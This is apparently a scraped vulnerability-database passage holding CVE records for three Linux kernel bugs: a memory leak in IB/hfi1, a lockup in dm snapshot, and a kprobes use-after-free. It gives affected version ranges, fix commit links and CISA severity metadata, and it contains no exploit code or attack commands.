Version: 7724105686e718ac476a6ad3304fea2fbcfcffde Version: 7724105686e718ac476a6ad3304fea2fbcfcffde Version: 7724105686e718ac476a6ad3304fea2fbcfcffde Version: 7724105686e718ac476a6ad3304fea2fbcfcffde Version: 7724105686e718ac476a6ad3304fea2fbcfcffde Version: 7724105686e718ac476a6ad3304fea2fbcfcffde Version: 7724105686e718ac476a6ad3304fea2fbcfcffde Version: 7724105686e718ac476a6ad3304fea2fbcfcffde |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26839",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-17T19:24:08.338788Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-17T19:24:16.847Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:14:13.692Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/2e4f9f20b32658ef3724aa46f7aef4908d2609e3"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/cecfb90cf71d91e9efebd68b9e9b84661b277cc8"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3fa240bb6b2dbb3e7a3ee1440a4889cbb6207eb7"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/52de5805c147137205662af89ed7e083d656ae25"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f0d857ce31a6bc7a82afcdbadb8f7417d482604b"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b41d0ade0398007fb746213f09903d52a920e896"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8412c86e89cc78d8b513cb25cf2157a2adf3670a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/809aa64ebff51eb170ee31a95f83b2d21efa32e2"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/infiniband/hw/hfi1/pio.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "2e4f9f20b32658ef3724aa46f7aef4908d2609e3",
"status": "affected",
"version": "7724105686e718ac476a6ad3304fea2fbcfcffde",
"versionType": "git"
},
{
"lessThan": "cecfb90cf71d91e9efebd68b9e9b84661b277cc8",
"status": "affected",
"version": "7724105686e718ac476a6ad3304fea2fbcfcffde",
"versionType": "git"
},
{
"lessThan": "3fa240bb6b2dbb3e7a3ee1440a4889cbb6207eb7",
"status": "affected",
"version": "7724105686e718ac476a6ad3304fea2fbcfcffde",
"versionType": "git"
},
{
"lessThan": "52de5805c147137205662af89ed7e083d656ae25",
"status": "affected",
"version": "7724105686e718ac476a6ad3304fea2fbcfcffde",
"versionType": "git"
},
{
"lessThan": "f0d857ce31a6bc7a82afcdbadb8f7417d482604b",
"status": "affected",
"version": "7724105686e718ac476a6ad3304fea2fbcfcffde",
"versionType": "git"
},
{
"lessThan": "b41d0ade0398007fb746213f09903d52a920e896",
"status": "affected",
"version": "7724105686e718ac476a6ad3304fea2fbcfcffde",
"versionType": "git"
},
{
"lessThan": "8412c86e89cc78d8b513cb25cf2157a2adf3670a",
"status": "affected",
"version": "7724105686e718ac476a6ad3304fea2fbcfcffde",
"versionType": "git"
},
{
"lessThan": "809aa64ebff51eb170ee31a95f83b2d21efa32e2",
"status": "affected",
"version": "7724105686e718ac476a6ad3304fea2fbcfcffde",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/infiniband/hw/hfi1/pio.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.3"
},
{
"lessThan": "4.3",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.308",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.270",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.211",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.150",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.80",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.19",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.7",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.308",
"versionStartIncluding": "4.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.270",
"versionStartIncluding": "4.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.211",
"versionStartIncluding": "4.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.150",
"versionStartIncluding": "4.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.80",
"versionStartIncluding": "4.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.19",
"versionStartIncluding": "4.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.7",
"versionStartIncluding": "4.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "4.3",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nIB/hfi1: Fix a memleak in init_credit_return\n\nWhen dma_alloc_coherent fails to allocate dd-\u003ecr_base[i].va,\ninit_credit_return should deallocate dd-\u003ecr_base and\ndd-\u003ecr_base[i] that allocated before. Or those resources\nwould be never freed and a memleak is triggered."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:57:41.410Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/2e4f9f20b32658ef3724aa46f7aef4908d2609e3"
},
{
"url": "https://git.kernel.org/stable/c/cecfb90cf71d91e9efebd68b9e9b84661b277cc8"
},
{
"url": "https://git.kernel.org/stable/c/3fa240bb6b2dbb3e7a3ee1440a4889cbb6207eb7"
},
{
"url": "https://git.kernel.org/stable/c/52de5805c147137205662af89ed7e083d656ae25"
},
{
"url": "https://git.kernel.org/stable/c/f0d857ce31a6bc7a82afcdbadb8f7417d482604b"
},
{
"url": "https://git.kernel.org/stable/c/b41d0ade0398007fb746213f09903d52a920e896"
},
{
"url": "https://git.kernel.org/stable/c/8412c86e89cc78d8b513cb25cf2157a2adf3670a"
},
{
"url": "https://git.kernel.org/stable/c/809aa64ebff51eb170ee31a95f83b2d21efa32e2"
}
],
"title": "IB/hfi1: Fix a memleak in init_credit_return",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26839",
"datePublished": "2024-04-17T10:10:05.536Z",
"dateReserved": "2024-02-19T14:20:24.182Z",
"dateUpdated": "2025-05-04T08:57:41.410Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-35805 (GCVE-0-2024-35805)
Vulnerability from cvelistv5
Published
2024-05-17 13:23
Modified
2025-05-04 09:05
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
dm snapshot: fix lockup in dm_exception_table_exit
There was reported lockup when we exit a snapshot with many exceptions.
Fix this by adding "cond_resched" to the loop that frees the exceptions.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T03:21:47.647Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e7d4cff57c3c43fdd72342c78d4138f509c7416e"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/9759ff196e7d248bcf8386a7451d6ff8537a7d9c"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/116562e804ffc9dc600adab6326dde31d72262c7"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3d47eb405781cc5127deca9a14e24b27696087a1"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e50f83061ac250f90710757a3e51b70a200835e2"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/fa5c055800a7fd49a36bbb52593aca4ea986a366"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/5f4ad4d0b0943296287313db60b3f84df4aad683"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6e7132ed3c07bd8a6ce3db4bb307ef2852b322dc"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-35805",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:42:41.586817Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:33:22.063Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/md/dm-snap.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "e7d4cff57c3c43fdd72342c78d4138f509c7416e",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "9759ff196e7d248bcf8386a7451d6ff8537a7d9c",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "116562e804ffc9dc600adab6326dde31d72262c7",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "3d47eb405781cc5127deca9a14e24b27696087a1",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "e50f83061ac250f90710757a3e51b70a200835e2",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "fa5c055800a7fd49a36bbb52593aca4ea986a366",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "5f4ad4d0b0943296287313db60b3f84df4aad683",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "6e7132ed3c07bd8a6ce3db4bb307ef2852b322dc",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/md/dm-snap.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.274",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.215",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.154",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.84",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.24",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.12",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.274",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.215",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.154",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.84",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.24",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndm snapshot: fix lockup in dm_exception_table_exit\n\nThere was reported lockup when we exit a snapshot with many exceptions.\nFix this by adding \"cond_resched\" to the loop that frees the exceptions."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:05:47.748Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/e7d4cff57c3c43fdd72342c78d4138f509c7416e"
},
{
"url": "https://git.kernel.org/stable/c/9759ff196e7d248bcf8386a7451d6ff8537a7d9c"
},
{
"url": "https://git.kernel.org/stable/c/116562e804ffc9dc600adab6326dde31d72262c7"
},
{
"url": "https://git.kernel.org/stable/c/3d47eb405781cc5127deca9a14e24b27696087a1"
},
{
"url": "https://git.kernel.org/stable/c/e50f83061ac250f90710757a3e51b70a200835e2"
},
{
"url": "https://git.kernel.org/stable/c/fa5c055800a7fd49a36bbb52593aca4ea986a366"
},
{
"url": "https://git.kernel.org/stable/c/5f4ad4d0b0943296287313db60b3f84df4aad683"
},
{
"url": "https://git.kernel.org/stable/c/6e7132ed3c07bd8a6ce3db4bb307ef2852b322dc"
}
],
"title": "dm snapshot: fix lockup in dm_exception_table_exit",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-35805",
"datePublished": "2024-05-17T13:23:13.554Z",
"dateReserved": "2024-05-17T12:19:12.342Z",
"dateUpdated": "2025-05-04T09:05:47.748Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-35955 (GCVE-0-2024-35955)
Vulnerability from cvelistv5
Published
2024-05-20 09:41
Modified
2025-05-04 12:56
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
kprobes: Fix possible use-after-free issue on kprobe registration
When unloading a module, its state is changing MODULE_STATE_LIVE ->
MODULE_STATE_GOING -> MODULE_STATE_UNFORMED. Each change will take
a time. `is_module_text_address()` and `__module_text_address()`
works with MODULE_STATE_LIVE and MODULE_STATE_GOING.
If we use `is_module_text_address()` and `__module_text_address()`
separately, there is a chance that the first one is succeeded but the
next one is failed because module->state becomes MODULE_STATE_UNFORMED
between those operations.
In `check_kprobe_address_safe()`, if the second `__module_text_address()`
is failed, that is ignored because it expected a kernel_text address.
But it may have failed simply because module->state has been changed
to MODULE_STATE_UNFORMED. In this case, arm_kprobe() will try to modify
non-exist module text address (use-after-free).
To fix this problem, we should not use separated `is_module_text_address()`
and `__module_text_address()`, but use only `__module_text_address()`
once and do `try_module_get(module)` which is only available with
MODULE_STATE_LIVE.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1c836bad43f3e2ff71cc397a6e6ccb4e7bd116f8 Version: 6a119c1a584aa7a2c6216458f1f272bf1bc93a93 Version: 2a49b025c36ae749cee7ccc4b7e456e02539cdc3 Version: a1edb85e60fdab1e14db63ae8af8db3f0d798fb6 Version: 28f6c37a2910f565b4f5960df52b2eccae28c891 Version: 28f6c37a2910f565b4f5960df52b2eccae28c891 Version: 28f6c37a2910f565b4f5960df52b2eccae28c891 Version: 28f6c37a2910f565b4f5960df52b2eccae28c891 Version: 4262b6eb057d86c7829168c541654fe0d48fdac8 Version: 97e813e6a143edf4208e15c72199c495ed80cea5 Version: 16a544f1e013ba0660612f3fe35393b143b19a84 |
||
{
"containers": {
"adp": [
{
"affected": [
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"lessThan": "b5808d400934",
"status": "affected",
"version": "1c836bad43f3",
"versionType": "git"
},
{
"lessThan": "93eb31e7c339",
"status": "affected",
"version": "6a119c1a584a",
"versionType": "git"
},
{
"lessThan": "93eb31e7c339",
"status": "affected",
"version": "2a49b025c36a",
"versionType": "git"
},
{
"lessThan": "2df2dd27066c",
"status": "affected",
"version": "a1edb85e60fd",
"versionType": "git"
},
{
"lessThan": "62029bc9ff2c",
"status": "affected",
"version": "28f6c37a2910",
"versionType": "git"
},
{
"lessThan": "d15023fb4073",
"status": "affected",
"version": "28f6c37a2910",
"versionType": "git"
},
{
"lessThan": "36b57c7d2f8b",
"status": "affected",
"version": "28f6c37a2910",
"versionType": "git"
},
{
"lessThan": "325f3fb551f8",
"status": "affected",
"version": "28f6c37a2910",
"versionType": "git"
},
{
"status": "affected",
"version": "6.0"
}
]
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2024-35955",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-05-20T17:42:32.103628Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-416",
"description": "CWE-416 Use After Free",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-08-01T13:44:14.513Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T03:21:48.971Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b5808d40093403334d939e2c3c417144d12a6f33"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/93eb31e7c3399e326259f2caa17be1e821f5a412"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/5062d1f4f07facbdade0f402d9a04a788f52e26d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/2df2dd27066cdba8041e46a64362325626bdfb2e"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/62029bc9ff2c17a4e3a2478d83418ec575413808"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d15023fb407337028a654237d8968fefdcf87c2f"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/36b57c7d2f8b7de224980f1a284432846ad71ca0"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/325f3fb551f8cd672dbbfc4cf58b14f9ee3fc9e8"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"kernel/kprobes.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "b5808d40093403334d939e2c3c417144d12a6f33",
"status": "affected",
"version": "1c836bad43f3e2ff71cc397a6e6ccb4e7bd116f8",
"versionType": "git"
},
{
"lessThan": "93eb31e7c3399e326259f2caa17be1e821f5a412",
"status": "affected",
"version": "6a119c1a584aa7a2c6216458f1f272bf1bc93a93",
"versionType": "git"
},
{
"lessThan": "5062d1f4f07facbdade0f402d9a04a788f52e26d",
"status": "affected",
"version": "2a49b025c36ae749cee7ccc4b7e456e02539cdc3",
"versionType": "git"
},
{
"lessThan": "2df2dd27066cdba8041e46a64362325626bdfb2e",
"status": "affected",
"version": "a1edb85e60fdab1e14db63ae8af8db3f0d798fb6",
"versionType": "git"
},
{
"lessThan": "62029bc9ff2c17a4e3a2478d83418ec575413808",
"status": "affected",
"version": "28f6c37a2910f565b4f5960df52b2eccae28c891",
"versionType": "git"
},
{
"lessThan": "d15023fb407337028a654237d8968fefdcf87c2f",
"status": "affected",
"version": "28f6c37a2910f565b4f5960df52b2eccae28c891",
"versionType": "git"
},
{
"lessThan": "36b57c7d2f8b7de224980f1a284432846ad71ca0",
"status": "affected",
"version": "28f6c37a2910f565b4f5960df52b2eccae28c891",
"versionType": "git"
},
{
"lessThan": "325f3fb551f8cd672dbbfc4cf58b14f9ee3fc9e8",
"status": "affected",
"version": "28f6c37a2910f565b4f5960df52b2eccae28c891",
"versionType": "git"
},
{
"status": "affected",
"version": "4262b6eb057d86c7829168c541654fe0d48fdac8",
"versionType": "git"
},
{
"status": "affected",
"version": "97e813e6a143edf4208e15c72199c495ed80cea5",
"versionType": "git"
},
{
"status": "affected",
"version": "16a544f1e013ba0660612f3fe35393b143b19a84",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"kernel/kprobes.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.0"
},
{
"lessThan": "6.0",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.313",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.275",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.216",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.157",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.87",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.28",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.7",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.313",
"versionStartIncluding": "4.19.256",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.275",
"versionStartIncluding": "5.4.211",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.216",
"versionStartIncluding": "5.10.137",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.157",
"versionStartIncluding": "5.15.61",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.87",
"versionStartIncluding": "6.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.28",
"versionStartIncluding": "6.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.7",
"versionStartIncluding": "6.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "6.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "4.14.291",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "5.18.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "5.19.2",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nkprobes: Fix possible use-after-free issue on kprobe registration\n\nWhen unloading a module, its state is changing MODULE_STATE_LIVE -\u003e\n MODULE_STATE_GOING -\u003e MODULE_STATE_UNFORMED. Each change will take\na time. `is_module_text_address()` and `__module_text_address()`\nworks with MODULE_STATE_LIVE and MODULE_STATE_GOING.\nIf we use `is_module_text_address()` and `__module_text_address()`\nseparately, there is a chance that the first one is succeeded but the\nnext one is failed because module-\u003estate becomes MODULE_STATE_UNFORMED\nbetween those operations.\n\nIn `check_kprobe_address_safe()`, if the second `__module_text_address()`\nis failed, that is ignored because it expected a kernel_text address.\nBut it may have failed simply because module-\u003estate has been changed\nto MODULE_STATE_UNFORMED. In this case, arm_kprobe() will try to modify\nnon-exist module text address (use-after-free).\n\nTo fix this problem, we should not use separated `is_module_text_address()`\nand `__module_text_address()`, but use only `__module_text_address()`\nonce and do `try_module_get(module)` which is only available with\nMODULE_STATE_LIVE."
}
],
